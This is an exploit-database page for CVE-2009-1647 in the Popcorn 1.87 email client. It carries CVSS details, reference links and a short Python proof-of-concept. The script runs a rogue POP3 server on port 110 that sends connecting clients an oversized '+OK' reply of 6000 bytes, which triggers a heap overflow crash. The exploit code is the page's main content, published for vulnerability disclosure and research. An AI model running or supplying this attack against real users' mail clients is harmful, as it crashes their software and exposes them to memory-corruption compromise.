Popcorn 1.87 Remote Heap Overflow Exploit PoC

2009.05.18
Credit: x.CJP.x
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1647
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python #[x]Product download : http://www.ultrafunk.com/products/popcorn/ #[+]Founder : x.CJP.x #[+]Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,Bibicha.. :=) #[-]Seni seviyorum, base64_decode('TW91bmE='); from socket import * import struct buffer="\x41"*6000 # just random s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 110)) s.listen(1) print "[*] Listening on [POP3] 110" c, addr = s.accept() print "[*] Connection accepted from: %s" % (addr[0]) c.send("+OK "+buffer+"\r\n") c.recv(512) raw_input("[*] Crashed!\nPress key to quit") c.close() s.close()

References:

http://www.vupen.com/english/advisories/2009/1170
http://www.securityfocus.com/bid/34699
http://www.milw0rm.com/exploits/8526


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top